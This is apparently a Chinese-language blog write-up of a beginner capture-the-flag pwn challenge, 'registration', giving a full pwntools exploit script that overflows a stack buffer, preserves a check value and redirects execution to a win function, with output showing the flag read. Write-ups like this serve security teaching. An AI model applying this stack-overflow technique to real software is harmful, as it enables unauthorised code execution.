Pwnctf registration Writeup

kazma 成大資安社創辦人/社長

2023-12-21 21:32:41 2023-12-21 21:32:41 Created 2023-12-21 21:56:01 2023-12-21 21:56:01 Updated

registration

這題的關鍵是他會隨機生一個 id，然後存到一個全域變數，最後會去檢查這個值是否被更動：

只要弄清楚變數具體的位置，這題就輕鬆通關了：

exploit.py：

from pwn import *
import warnings

warnings.filterwarnings("ignore", category = BytesWarning)
context.arch = 'amd64'
r = process('./registration')

win = 0x4007d6
ret = 0x400619

r.recvline()
id = int(r.recvline().decode().split(':')[1].strip())
success(f"id: {id}")
r.sendlineafter(b':', str('kazma'))

p = flat(b'a'*0x3c, id)
p = p.ljust(72) + flat(ret, win)

r.sendlineafter(b':', p)
r.interactive()

result：

└─$ python exploit.py
[+] Starting local process './registration': pid 306835
[+] id: 81
[*] Switching to interactive mode
$ cat flag
MyFirstCTF{B3_c4r3FuL_0f_l0cAl_V4rI4b13_0N_sT4ck_OwO}

Pwned !!!

Title: Pwnctf registration Writeup
Author: kazma
Created at : 2023-12-21 21:32:41
Updated at : 2023-12-21 21:56:01
Link: https://kazma.tw/2023/12/21/Pwnctf-registration-Writeup/
License: This work is licensed under CC BY-NC-SA 4.0.

Comments

kazma's blog

Pwnctf registration Writeup

registration

Pwned !!!